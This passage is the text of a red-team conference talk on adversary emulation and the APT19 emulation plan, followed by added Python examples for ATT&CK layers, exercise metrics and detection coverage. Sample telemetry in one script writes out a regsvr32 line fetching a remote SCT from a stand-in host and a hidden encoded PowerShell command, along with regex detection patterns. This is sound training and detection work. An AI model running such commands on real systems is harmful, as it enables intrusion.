Adversary Emulation
JORGE ORCHILLES
#WHOAMI
Led offensive security team at a large financial for the past 10 years
Published industry contributions include:
⑊ Founding member MITRE Engenuity Center
⑊ Co-Author GFMA Threat-led Penetration Testing & Red Team Framework
⑊ SANS Instructor and author of Red Team course: SEC564
⑊ NSI Technologist Fellow; ISSA Fellow
⑊ Common Vulnerability Scoring System (CVSSv3.1)
⑊ Author of Windows 7 Administrators reference (Syngress)
@JORGEORCHILLES
Vulnerability Scanning → Vulnerability Assessment → Penetration Testing → Red Team → In Person Purple Team → Continuous Purple Team
ADVERSARY EMULATION
Definition: A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective like that of a realistic adversary.
Goal: Emulate an end-to-end attack against a target organization. Obtain a holistic view of the organization's preparedness for a real, sophisticated attack.
An end-to-end assessment of the entire organization
⑊ Main differentiator from penetration testing
- Tests the defenders, not the defenses (detection vs. prevention)
- People, Process, and Technology
- Not a limited-scope test targeting just a particular product, infrastructure, network, application, URL, or domain
⑊ Full Cyber Kill Chain from Recon to Objective
⑊ Often a blind, unannounced exercise
⑊ Determine which TTPs would work undetected if a true attack occurred, and produce an action plan to remediate
Measuring the effectiveness of People, Process, and Technology
Documented metrics and timeline of the entire exercise
⑊ Time and TTPs to obtain initial access
⑊ TTPs that allowed moving laterally
⑊ Identify TTPs not prevented or detected
⑊ Process and time to escalate events into an incident
⑊ Time to contain
⑊ Time to eradicate
⑊ Process to engage hunt team, coordinate communications, alert leadership and correlate all events and realize sophisticated, targeted attack
ASSUMPTIONS
That attack won't work here because…
"We applied all patches"
"We have outbound DLP"
"Our users would never open a macro"
"Our applications have MFA"
"Our network is segmented and the only way out is through proxy"
"We have firewalls, AV, and IDS"
Trust but verify
Can the Iranians breach us?
Training and improving the Blue Team
⑊ Every Red Team Exercise will result in Blue Team getting better
⑊ As you measure the people, process, and technology you will see improvements
⑊ Lessons will be learned, and processes improved
⑊ The more you train, the more you improve
FRAMEWORK & METHODOLOGIES
⑊ Cyber Kill Chain – Lockheed Martin
⑊ Unified Cyber Kill Chain – Paul Pols
⑊ ATT&CK – MITRE
Regulatory
⑊ CBEST Intelligence Led Testing – Bank of England
⑊ Threat Intelligence-Based Ethical Red Teaming – TIBER-EU
⑊ Red Team: Adversarial Attack Simulation Exercises – ABS (Association of Banks of Singapore)
⑊ intelligence-led Cyber Attack Simulation Testing (iCAST) – HKMA (Hong Kong Monetary Authority)
⑊ G-7 Fundamental Elements for Threat-Led Penetration Testing (G7FE-TLPT)
⑊ A Framework for the Regulatory Use of Penetration Testing and Red Teaming in the Financial Services Industry – GFMA (Global Financial Markets Association)
ATT&CK Enterprise Matrix excerpt (the first seven rows of each tactic column, as shown on the slide):
⑊ Initial Access: Drive-by Compromise; Exploit Public-Facing Application; External Remote Services; Hardware Additions; Replication Through Removable Media; Spearphishing Attachment; Spearphishing Link
⑊ Execution: AppleScript; CMSTP; Command-Line Interface; Compiled HTML File; Control Panel Items; Dynamic Data Exchange; Execution through API
⑊ Persistence: .bash_profile and .bashrc; Accessibility Features; Account Manipulation; AppCert DLLs; AppInit DLLs; Application Shimming; Authentication Package
⑊ Privilege Escalation: Access Token Manipulation; Accessibility Features; AppCert DLLs; AppInit DLLs; Application Shimming; Bypass User Account Control; DLL Search Order Hijacking
⑊ Defense Evasion: Access Token Manipulation; BITS Jobs; Binary Padding; Bypass User Account Control; CMSTP; Clear Command History; Code Signing
⑊ Credential Access: Account Manipulation; Bash History; Brute Force; Credential Dumping; Credentials in Files; Credentials in Registry; Exploitation for Credential Access
⑊ Discovery: Account Discovery; Application Window Discovery; Browser Bookmark Discovery; Domain Trust Discovery; File and Directory Discovery; Network Service Scanning; Network Share Discovery
⑊ Lateral Movement: AppleScript; Application Deployment Software; Distributed Component Object Model; Exploitation of Remote Services; Logon Scripts; Pass the Hash; Pass the Ticket
⑊ Collection: Audio Capture; Automated Collection; Clipboard Data; Data Staged; Data from Information Repositories; Data from Local System; Data from Network Shared Drive
⑊ Command and Control: Commonly Used Port; Communication Through Removable Media; Connection Proxy; Custom Command and Control Protocol; Custom Cryptographic Protocol; Data Encoding; Data Obfuscation
⑊ Exfiltration: Automated Exfiltration; Data Compressed; Data Encrypted; Data Transfer Size Limit; Exfiltration Over Alternative Protocol; Exfiltration Over Command and Control Channel; Exfiltration Over Other Network Medium
⑊ Impact: Data Destruction; Data Encrypted for Impact; Defacement; Disk Content Wipe; Disk Structure Wipe; Endpoint Denial of Service; Firmware Corruption
MITRE has developed the ATT&CK Matrix as a central repository for adversary TTPs. It is used by both red and blue teams. It is rapidly gaining traction as a de facto standard!
FRAMEWORK
Most organizations will take a hybrid approach based on the frameworks and methodologies just introduced:
⑊ Threat Intelligence
⑊ Planning
⑊ Testing
⑊ Closure
TACTICS | TECHNIQUES | PROCEDURES
Techniques (ATT&CK technique IDs):
⑊ T1086 – PowerShell
⑊ T1068 – Exploitation for Privilege Escalation
⑊ T1003 – Credential Dumping
Software (ATT&CK software IDs):
⑊ S0194 – PowerSploit
⑊ S0192 – Pupy
⑊ S0002 – Mimikatz
⑊ S0129 – AutoIT
Indicators:
⑊ Hash Value
⑊ IP Address
Source: https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
ATT&CK Navigator
Category: Description
Description: APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services.
Goal and Intent: Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks.
Command and Control: Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server
Initial Access: Spearphishing attachment (T1193); Spearphishing link (T1192)
Execution: PowerShell (T1086); User Execution; Hidden Windows (T1143) - used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload; DLL Side-Loading (T1073)
Discovery: System Owner/User Discovery (T1033); System Information Discovery (T1082); System Network Configuration Discovery (T1016)
Persistence: Registry Run Keys / Startup Folder (T1060) - establishes persistence by setting the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Defense Evasion: Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques
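The APT19 plan above turned into an ATT&CK Navigator layer, so the emulated techniques can be highlighted on the matrix for planning and for the closure report. This is an added example, not from the deck or from MITRE; the technique IDs are the slide's own (User Execution had no ID on the slide, so T1204 is supplied here), and the Navigator `versions` values are an assumption to adjust for your Navigator build.

```python
"""APT19 emulation plan as an ATT&CK Navigator layer (added example)."""
import json
from typing import Dict, List, Tuple

# Slide category -> [(technique ID, name, procedure note from the plan)].
# IDs are the ones printed on the slide (pre-2020 ATT&CK numbering).
APT19_PLAN: Dict[str, List[Tuple[str, str, str]]] = {
    "initial-access": [
        ("T1193", "Spearphishing Attachment", ""),
        ("T1192", "Spearphishing Link", ""),
    ],
    "execution": [
        ("T1086", "PowerShell", ""),
        # The slide lists User Execution without an ID; T1204 is its ATT&CK ID.
        ("T1204", "User Execution", "ID not on the slide"),
        ("T1143", "Hidden Window", "-W Hidden to conceal PowerShell windows (WindowStyle hidden)"),
        ("T1027", "Obfuscated Files or Information", "Base64 to obfuscate commands and the payload"),
        ("T1073", "DLL Side-Loading", ""),
    ],
    "persistence": [
        ("T1060", "Registry Run Keys / Startup Folder",
         r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"),
    ],
    "defense-evasion": [
        ("T1117", "Regsvr32", ""),
        ("T1064", "Scripting", "SCT file downloaded and launched to bypass application whitelisting"),
    ],
    "discovery": [
        ("T1033", "System Owner/User Discovery", ""),
        ("T1082", "System Information Discovery", ""),
        ("T1016", "System Network Configuration Discovery", ""),
    ],
    "command-and-control": [
        ("T1043", "Commonly Used Port", "TCP port 80"),
        ("T1071", "Standard Application Layer Protocol", "HTTP"),
        ("T1140", "Deobfuscate/Decode Files or Information", ""),
        ("T1132", "Data Encoding", "Base64-encoded communications to the C2 server"),
    ],
}


def technique_ids(plan=APT19_PLAN) -> List[str]:
    """All technique IDs in the plan, de-duplicated and sorted."""
    return sorted({tid for rows in plan.values() for tid, _, _ in rows})


def navigator_layer(plan=APT19_PLAN, name="APT19 emulation plan", color="#fd8d3c") -> dict:
    """Build a Navigator layer that highlights every technique in the plan.

    No "tactic" field is set on purpose: a technique ATT&CK maps to more than
    one tactic (T1027, for instance) is then highlighted wherever it appears in
    the matrix, and the slide's own category is kept in the comment instead.
    """
    techniques = []
    for category, rows in plan.items():
        for tid, tname, note in rows:
            comment = f"{tname} ({category})" + (f": {note}" if note else "")
            techniques.append({"techniqueID": tid, "color": color,
                               "comment": comment, "enabled": True, "score": 1})
    return {
        "name": name,
        "domain": "enterprise-attack",
        "description": "Adversary emulation plan built from the APT19 profile (added example).",
        # Assumption: layer/navigator version strings; set them to match your Navigator.
        "versions": {"layer": "4.4", "navigator": "4.8"},
        "techniques": techniques,
        "legendItems": [{"label": "Emulated TTP", "color": color}],
    }


def layer_json(plan=APT19_PLAN) -> str:
    """Serialize the layer for upload through Navigator's 'Open Existing Layer'."""
    return json.dumps(navigator_layer(plan), indent=2)


if __name__ == "__main__":
    print(layer_json())
```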
PLANNING
TRUSTED AGENTS (White Team or White Cell)
o Limited number of people with knowledge of the exercise
o When players find out about the exercise their behavior changes
o Individuals whose daily roles and responsibilities put them in a position to contribute to reducing the risk of causing unintended impact to production systems and/or inaccurate senior or external escalation
RULES OF ENGAGEMENT
Establish the responsibility, relationship, and guidelines between Trusted Agents and Players
o Rules for Blue Team
- Carry out all activity as any other incident
- Trusted Agents will report what incidents are being investigated
- Do not report exercise related items to regulators
o Rules for Red Team
- Do not bring down any business process or operation
- Communicate all actions during daily brief
ATTACK INFRASTRUCTURE
Red Team is responsible for setting up infrastructure to emulate TTPs
o Choose and procure external hosting service providers
o Purchase domain names
o Generate domain certificates
o Set up mail servers
o Set up phishing and credential theft sites
o Confirm reputation and categorization of all domains and IPs
o Set up Short and Long Haul C2 infrastructure
o Configure custom C2 tooling
o Test external C2 communication
Matrix of command and control frameworks for Red Teamers
⑊ Google doc of most C2 frameworks: www.thec2matrix.com
⑊ Documents various capabilities of each framework
⑊ There is no right or wrong, better or worse framework
⑊ Find the ideal C2 for your current objective
⑊ Wizard-like UI to select which one: ask.thec2matrix.com
⑊ How-To site for using C2s: howto.thec2matrix.com
⑊ SANS Slingshot C2 Matrix Edition
Let’s do it Live!
Vulnerability Scanning → Vulnerability Assessment → Penetration Testing → Red Team
Emulate APT19 with Empire3 & Starkiller
https://howto.thec2matrix.com/c2/empire#red-team-village-mayhem-demo-of-apt19
CLOSURE
⑊ What TTPs were prevented? Why? Document these too!
⑊ What was detected? How long did it take?
- Time to contain
- Time to eradicate
⑊ Were processes followed?
- Process and time to escalate events into an incident
- Process to engage hunt team
- Process to coordinate communications & alert leadership
- Process to correlate all events and realize a sophisticated, targeted attack
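The metrics listed on the measurement slide and again under Closure (time to initial access, TTPs neither prevented nor detected, time to escalate into an incident, time to contain, time to eradicate), computed from an exercise timeline. This is an added example and not part of the deck; the log format, timestamps and the ATT&CK IDs in the sample log are constructed, and the detection and prevention events are whatever the Blue Team and Trusted Agents recorded during the exercise.

```python
"""Exercise metrics from a Red Team exercise timeline (added example)."""
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional

# Constructed timeline: "<ISO timestamp> <kind> [<ATT&CK ID>]   # note".
# Exercise-level kinds: start, initial_access, incident, contained, eradicated.
# TTP-level kinds (carry an ATT&CK ID): executed, prevented, detected.
SAMPLE_LOG = """
2020-08-03T09:00:00 start
2020-08-03T09:30:00 executed T1193   # spearphishing attachment delivered
2020-08-03T10:15:00 executed T1086   # PowerShell stager ran on a workstation
2020-08-03T10:15:00 initial_access
2020-08-03T10:20:00 executed T1060   # Run key persistence set
2020-08-03T10:25:00 executed T1003   # credential dumping attempt
2020-08-03T10:25:30 prevented T1003  # blocked by endpoint protection
2020-08-03T10:40:00 executed T1117   # regsvr32 SCT execution
2020-08-03T11:10:00 detected T1086   # SOC alert on hidden PowerShell window
2020-08-03T12:00:00 incident         # SOC escalates the events to an incident
2020-08-03T15:00:00 contained        # host isolated, account disabled
2020-08-04T09:00:00 eradicated       # persistence removed, host rebuilt
"""


@dataclass
class Event:
    ts: datetime
    kind: str
    ttp: Optional[str] = None  # ATT&CK technique ID for TTP-level events


def parse_log(text: str) -> List[Event]:
    """Parse the timeline, dropping '#' comments and blank lines; sort by time."""
    events = []
    for raw in text.splitlines():
        parts = raw.split("#", 1)[0].split()
        if len(parts) < 2:
            continue
        ttp = parts[2] if len(parts) > 2 else None
        events.append(Event(datetime.fromisoformat(parts[0]), parts[1], ttp))
    return sorted(events, key=lambda e: e.ts)


def _first(events: List[Event], kind: str) -> Optional[datetime]:
    return next((e.ts for e in events if e.kind == kind), None)


def _minutes(a: Optional[datetime], b: Optional[datetime]) -> Optional[float]:
    return None if a is None or b is None else (b - a).total_seconds() / 60


def ttp_outcomes(events: List[Event]) -> Dict[str, dict]:
    """Per TTP: when it ran, whether it was prevented or detected, minutes to detection."""
    out: Dict[str, dict] = {}
    for e in events:
        if e.ttp is None:
            continue
        rec = out.setdefault(e.ttp, {"executed": None, "prevented": False,
                                     "detected": False, "minutes_to_detect": None})
        if e.kind == "executed" and rec["executed"] is None:
            rec["executed"] = e.ts
        elif e.kind == "prevented":
            rec["prevented"] = True
        elif e.kind == "detected":
            rec["detected"] = True
            if rec["minutes_to_detect"] is None:
                rec["minutes_to_detect"] = _minutes(rec["executed"], e.ts)
    return out


def gaps(events: List[Event]) -> List[str]:
    """TTPs neither prevented nor detected: the action plan to remediate starts here."""
    return sorted(t for t, r in ttp_outcomes(events).items()
                  if not r["prevented"] and not r["detected"])


def exercise_metrics(events: List[Event]) -> Dict[str, Optional[float]]:
    """Timeline metrics in minutes, one per item on the measurement slide."""
    first_detection = min((e.ts for e in events if e.kind == "detected"), default=None)
    incident = _first(events, "incident")
    return {
        "minutes_to_initial_access": _minutes(_first(events, "start"),
                                              _first(events, "initial_access")),
        "minutes_to_escalate": _minutes(first_detection, incident),
        "minutes_to_contain": _minutes(incident, _first(events, "contained")),
        "minutes_to_eradicate": _minutes(incident, _first(events, "eradicated")),
    }


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for name, value in exercise_metrics(evs).items():
        print(f"{name}: {value}")
    print("TTPs neither prevented nor detected:", gaps(evs))
```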
[Diagram of Purple Team exercise tools, labelled: Threat Catalog, Cyber Threat Intelligence, Emulation Plan, MITRE ATT&CK, C2 Server & Reports for the Business, Production, Automated Emulation, Initial Access]
https://medium.com/@jorgeorchilles/purple-team-exercise-tools-a85187ce341
⑊ Red Team will be asked to repeat TTPs
⑊ Don't waste Red Team Operator time re-doing the same TTP while engineers, operations, and SOC get detection working
Thank you!
Q & A?
@JorgeOrchilles
@C2_Matrix
https://www.thec2matrix.com/
https://www.sans.org/sec564

Adversary Emulation - Red Team Village - Mayhem 2020

  • 2. #WHOAMILed offensive security team at large financial for past 10 years Published industry contributions include: ⑊ Founding member MITRE Engenuity Center ⑊ Co-Author GFMA Threat-led Penetration Testing & Red Team Framework ⑊ SANS Instructor and author of Red Team course: SEC564 ⑊ NSI Technologist Fellow; ISSA Fellow ⑊ Common Vulnerability Scoring System (CVSSv3.1) ⑊ Author of Windows 7 Administrators reference (Syngress) @JORGEORCHILLES
  • 3. 3 VULNERABILITY SCANNING VULNERABILITY ASSESSMENT PENETRATION TESTING RED TEAM IN PERSON PURPLE TEAM CONTINOUS PURPLE TEAM ADVERSARY EMULATION Definition: A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective like those of realistic adversary. Goal: Emulate an end-to-end attack against a target organization. Obtain a holistic view of the organization’s preparedness for a real, sophisticated attack. @JORGEORCHILLES
  • 4. 4 An end to end assessment of the entire organization ⑊ Main differentiator from penetration testing - Tests the defenders not the defenses (detection vs. prevention) - People, Process, and Technology - Not a limited scope test targeting just a particular product, infrastructure, network, application, URL, or domain ⑊ Full Cyber Kill Chain from Recon to Objective ⑊ Often blind, unannounced exercise ⑊ Determine what TTPs would work, undetected if a true attack occurred and action plan to remediate @JORGEORCHILLES
  • 5. 5 Measuring the effectiveness of People, Process, and Technology Documented metrics and timeline of entire exercise ⑊ Time and TTPs to obtain initial access ⑊ TTPs that allowed moving laterally ⑊ Identify TTPs not prevented or detected ⑊ Process and time to escalate events into an incident ⑊ Time to contain ⑊ Time to eradicate ⑊ Process to engage hunt team, coordinate communications, alert leadership and correlate all events and realize sophisticated, targeted attack @JORGEORCHILLES
• 6. ASSUMPTIONS
  That attack won’t work here because…
  “We applied all patches”
  “We have outbound DLP”
  “Our users would never open a macro”
  “Our applications have MFA”
  “Our network is segmented and only way out is through proxy”
  “We have firewalls, AV, and IDS”
  Trust but verify
  Can the Iranians breach us?
• 7. Training and improving the Blue Team
  ⑊ Every Red Team Exercise will result in Blue Team getting better
  ⑊ As you measure the people, process, and technology you will see improvements
  ⑊ Lessons will be learned, and processes improved
  ⑊ The more you train, the more you improve
• 8. FRAMEWORK & METHODOLOGIES
  ⑊ Cyber Kill Chain – Lockheed Martin
  ⑊ Unified Cyber Kill Chain – Paul Pols
  ⑊ ATT&CK – MITRE
  Regulatory
  ⑊ CBEST Intelligence Led Testing – Bank of England
  ⑊ Threat Intelligence-Based Ethical Red Teaming – TIBER-EU
  ⑊ Red Team: Adversarial Attack Simulation Exercises – ABS (Association of Banks of Singapore)
  ⑊ intelligence-led Cyber Attack Simulation Testing (iCAST) – HKMA (Hong Kong Monetary Authority)
  ⑊ G-7 Fundamental Elements for Threat-Led Penetration Testing (G7FE-TLPT)
  ⑊ A Framework for the Regulatory Use of Penetration Testing and Red Teaming in the Financial Services Industry – GFMA (Global Financial Markets Association)
• 9. ATT&CK Matrix (excerpt: the first seven rows of each tactic column)
  INITIAL ACCESS: Drive-by Compromise; Exploit Public-Facing Application; External Remote Services; Hardware Additions; Replication Through Removable Media; Spearphishing Attachment; Spearphishing Link
  EXECUTION: AppleScript; CMSTP; Command-Line Interface; Compiled HTML File; Control Panel Items; Dynamic Data Exchange; Execution through API
  PERSISTENCE: .bash_profile and .bashrc; Accessibility Features; Account Manipulation; AppCert DLLs; AppInit DLLs; Application Shimming; Authentication Package
  PRIVILEGE ESCALATION: Access Token Manipulation; Accessibility Features; AppCert DLLs; AppInit DLLs; Application Shimming; Bypass User Account Control; DLL Search Order Hijacking
  DEFENSE EVASION: Access Token Manipulation; BITS Jobs; Binary Padding; Bypass User Account Control; CMSTP; Clear Command History; Code Signing
  CREDENTIAL ACCESS: Account Manipulation; Bash History; Brute Force; Credential Dumping; Credentials in Files; Credentials in Registry; Exploitation for Credential Access
  DISCOVERY: Account Discovery; Application Window Discovery; Browser Bookmark Discovery; Domain Trust Discovery; File and Directory Discovery; Network Service Scanning; Network Share Discovery
  LATERAL MOVEMENT: AppleScript; Application Deployment Software; Distributed Component Object Model; Exploitation of Remote Services; Logon Scripts; Pass the Hash; Pass the Ticket
  COLLECTION: Audio Capture; Automated Collection; Clipboard Data; Data Staged; Data from Information Repositories; Data from Local System; Data from Network Shared Drive
  COMMAND AND CONTROL: Commonly Used Port; Communication Through Removable Media; Connection Proxy; Custom Command and Control Protocol; Custom Cryptographic Protocol; Data Encoding; Data Obfuscation
  EXFILTRATION: Automated Exfiltration; Data Compressed; Data Encrypted; Data Transfer Size Limits; Exfiltration Over Alternative Protocol; Exfiltration Over Command and Control Channel; Exfiltration Over Other Network Medium
  IMPACT: Data Destruction; Data Encrypted for Impact; Defacement; Disk Content Wipe; Disk Structure Wipe; Endpoint Denial of Service; Firmware Corruption
  MITRE has developed the ATT&CK Matrix as a central repository for adversary TTPs. It is used by both red and blue teams. It is rapidly gaining traction as a de facto standard!
• 10. FRAMEWORK
  Most organizations will take a hybrid approach based on the frameworks and methodologies just introduced
  ⑊ Threat Intelligence
  ⑊ Planning
  ⑊ Testing
  ⑊ Closure
• 11. TACTICS | TECHNIQUES | PROCEDURES
  Techniques: T1086 – PowerShell; T1068 – Exploitation for Privilege Escalation; T1003 – Credential Dumping
  Software: S0194 – PowerSploit; S0192 – Pupy; S0002 – Mimikatz; S0129 – AutoIT
  Indicators: Hash Value; IP Address
  https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
• 13. APT19 emulation plan (Category: Description)
  Description: APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services.
  Goal and Intent: Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks.
  Command and Control: Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server
  Initial Access: Spearphishing attachment (T1193); Spearphishing link (T1192)
  Execution: PowerShell (T1086); User Execution; Hidden Window (T1143) - used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload; DLL Side-Loading (T1073)
  Discovery: System Owner/User Discovery (T1033); System Information Discovery (T1082); System Network Configuration Discovery (T1016)
  Persistence: Registry Run Keys / Startup Folder (T1060) - establishes persistence by setting the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  Defense Evasion: Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques
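An emulation plan like the APT19 table is most useful to the Blue Team when each row maps to something the SOC can check telemetry against. The following is an added example, not code from the slides or from any project: it keeps the slide's technique IDs as a plan, runs a few small detection rules over constructed endpoint records (hypothetical hosts, command lines and a reserved `example.invalid` domain), and reports which planned techniques the telemetry evidenced and which it never saw. The rules and the event shape are assumptions, chosen to resemble process-creation and registry-set records from an EDR or Sysmon feed.

```python
"""Score constructed endpoint telemetry against an APT19-style emulation plan.

Added example (not from the slides or any project): the plan dictionary
carries the technique IDs the slide lists for APT19; the events and the
detection rules are hypothetical and kept deliberately small.
"""
import base64
import re

# Technique IDs and names as given on the slide's APT19 table.
EMULATION_PLAN = {
    "T1193": "Spearphishing Attachment",
    "T1086": "PowerShell",
    "T1143": "Hidden Window (-W Hidden)",
    "T1027": "Obfuscated Files or Information (Base64)",
    "T1060": "Registry Run Keys / Startup Folder",
    "T1117": "Regsvr32",
    "T1064": "Scripting (SCT file)",
    "T1071": "Standard Application Layer Protocol (HTTP)",
    "T1043": "Commonly Used Port (TCP/80)",
}

# Constructed telemetry shaped like process-creation and registry-set records
# from an EDR or Sysmon feed (hypothetical hosts, users and command lines).
SAMPLE_EVENTS = [
    {"type": "process", "image": "powershell.exe",
     "cmdline": "powershell.exe -W Hidden -NoP -enc ZQBjAGgAbwAgAGgAaQA="},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r"C:\Users\jdoe\AppData\Roaming\upd.exe"},
    {"type": "process", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /u /i:http://example.invalid/a.sct scrobj.dll"},
    {"type": "process", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
REGSVR32_SCT = re.compile(r"/i:\S*\.sct", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE text), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(event):
    """Map one telemetry record to the ATT&CK technique IDs it evidences."""
    hits = set()
    if event["type"] == "process":
        image = event["image"].lower()
        cmd = event["cmdline"]
        if image == "powershell.exe":
            if HIDDEN_WINDOW.search(cmd):
                hits.update({"T1086", "T1143"})
            if decode_encoded_command(cmd) is not None:
                hits.update({"T1086", "T1027"})
        elif image == "regsvr32.exe" and REGSVR32_SCT.search(cmd):
            hits.update({"T1117", "T1064"})
    elif event["type"] == "registry":
        if event["key"].lower().endswith(r"\currentversion\run"):
            hits.add("T1060")
    return hits


def coverage(plan, events):
    """Split the plan into techniques the telemetry evidenced and those it did not."""
    observed = set()
    for event in events:
        observed |= detect(event)
    return {
        "detected": sorted(t for t in plan if t in observed),
        "missed": sorted(t for t in plan if t not in observed),
    }


if __name__ == "__main__":
    result = coverage(EMULATION_PLAN, SAMPLE_EVENTS)
    for label in ("detected", "missed"):
        print(label + ":", ", ".join(f"{t} {EMULATION_PLAN[t]}" for t in result[label]))
```

The "missed" list is the interesting output for closure: in the constructed sample the phishing delivery and the HTTP/port-80 C2 rows never show up in endpoint telemetry at all, which points at mail-gateway and proxy logs as the next data sources to bring into the exercise rather than more endpoint rules.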
• 14. PLANNING
  TRUSTED AGENTS (White Team or White Cell)
    o Limited number of people with knowledge of the exercise
    o When players find out about exercise their behavior changes
    o Individuals whose daily roles and responsibilities put them in a position to contribute to reducing the risk of causing unintended impact to production systems and/or inaccurate senior or external escalation
  RULES OF ENGAGEMENT
    Establish the responsibility, relationship, and guidelines between Trusted Agents and Players
    o Rules for Blue Team
      o Carry out all activity as any other incident
      o Trusted Agents will report what incidents are being investigated
      o Do not report exercise related items to regulators
    o Rules for Red Team
      o Do not bring down any business process or operation
      o Communicate all actions during daily brief
  ATTACK INFRASTRUCTURE
    Red Team is responsible for setting up infrastructure to emulate TTPs
    o Choose and procure external hosting service providers
    o Purchase domain names
    o Generate domain certificates
    o Setup mail servers
    o Setup phishing and credential theft sites
    o Confirm reputation and categorization of all domains and IPs
    o Setup Short and Long Haul C2 infrastructure
    o Configure custom C2 tooling
    o Test external C2 communication
• 15. Matrix of command and control frameworks for Red Teamers
  ⑊ Google doc of most C2 frameworks: www.thec2matrix.com
  ⑊ Documents various capabilities of each framework
  ⑊ There is no right or wrong, better or worse framework
  ⑊ Find ideal C2 for your current objective
  ⑊ Wizard like UI to select which one: ask.thec2matrix.com
  ⑊ How-To Site for using C2s: howto.thec2matrix.com
  ⑊ SANS Slingshot C2 Matrix Edition
• 16. Let’s do it Live!
• 21. Emulate APT19 with Empire3 & Starkiller
  (banner: VULNERABILITY SCANNING | VULNERABILITY ASSESSMENT | PENETRATION TESTING | RED TEAM)
  https://howto.thec2matrix.com/c2/empire#red-team-village-mayhem-demo-of-apt19
• 22. CLOSURE
  ⑊ What TTPs were prevented? Why? Document these too!
  ⑊ What was detected? How long did it take?
    - Time to contain
    - Time to eradicate
  ⑊ Were processes followed?
    - Process and time to escalate events into an incident
    - Process to engage hunt team
    - Process to coordinate communications & alert leadership
    - Process to correlate all events and realize sophisticated, targeted attack
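The closure questions above only become metrics once the exercise timeline is written down with timestamps for both teams. The following is an added example, not from the slides or any project: it takes a constructed, hypothetical timeline (red actions tagged with ATT&CK technique IDs, blue events tagged with the phase they represent) and computes the numbers the closure slide asks for: time to first detection, to escalation, to containment and to eradication, per-TTP dwell time, which TTPs a control prevented outright, which ones nobody ever detected, and whether the hunt team was engaged. The phase names and the `Event` record are assumptions.

```python
"""Compute the closure metrics for an adversary emulation exercise.

Added example (not from the slides or any project): the timeline is a
constructed, hypothetical one; the phases and metrics follow the closure
slide (time to detect, escalate, contain, eradicate; TTPs prevented or
never detected; whether the hunt team was engaged).
"""
from dataclasses import dataclass
from datetime import datetime
from typing import Optional


@dataclass(frozen=True)
class Event:
    ts: datetime
    team: str                        # "red" or "blue"
    kind: str                        # red: ATT&CK technique ID; blue: phase name
    note: str
    technique: Optional[str] = None  # blue: the TTP this phase relates to, if any
    prevented: bool = False          # red: a control blocked the action outright


def ev(ts, team, kind, note, technique=None, prevented=False):
    return Event(datetime.fromisoformat(ts), team, kind, note, technique, prevented)


# Constructed exercise timeline (hypothetical dates and findings).
TIMELINE = [
    ev("2020-05-04T09:00", "red", "T1193", "spearphishing attachment delivered"),
    ev("2020-05-04T09:14", "red", "T1086", "hidden PowerShell stager executed"),
    ev("2020-05-04T09:15", "red", "T1060", "HKCU Run key persistence set"),
    ev("2020-05-04T09:40", "red", "T1003", "credential dumping attempt", prevented=True),
    ev("2020-05-04T10:05", "blue", "detected", "EDR alert: hidden PowerShell window", technique="T1086"),
    ev("2020-05-04T10:50", "blue", "incident", "SOC escalated the alert to an incident"),
    ev("2020-05-04T11:10", "blue", "hunt_engaged", "hunt team pulled in"),
    ev("2020-05-04T11:30", "blue", "detected", "hunt finds Run key on the host", technique="T1060"),
    ev("2020-05-04T13:00", "blue", "contained", "host isolated, C2 domain blocked"),
    ev("2020-05-05T09:00", "blue", "eradicated", "host reimaged, credentials rotated"),
]


def minutes(start, end):
    """Whole minutes between two timestamps, or None if either phase never happened."""
    if start is None or end is None:
        return None
    return int((end - start).total_seconds() // 60)


def first_blue(timeline, phase):
    """Timestamp of the first blue-team event in the given phase, or None."""
    hits = [e.ts for e in timeline if e.team == "blue" and e.kind == phase]
    return min(hits) if hits else None


def exercise_metrics(timeline):
    red = [e for e in timeline if e.team == "red"]
    start = min(e.ts for e in red)
    detected = first_blue(timeline, "detected")
    metrics = {
        "time_to_detect_min": minutes(start, detected),
        "time_to_escalate_min": minutes(detected, first_blue(timeline, "incident")),
        "time_to_contain_min": minutes(detected, first_blue(timeline, "contained")),
        "time_to_eradicate_min": minutes(detected, first_blue(timeline, "eradicated")),
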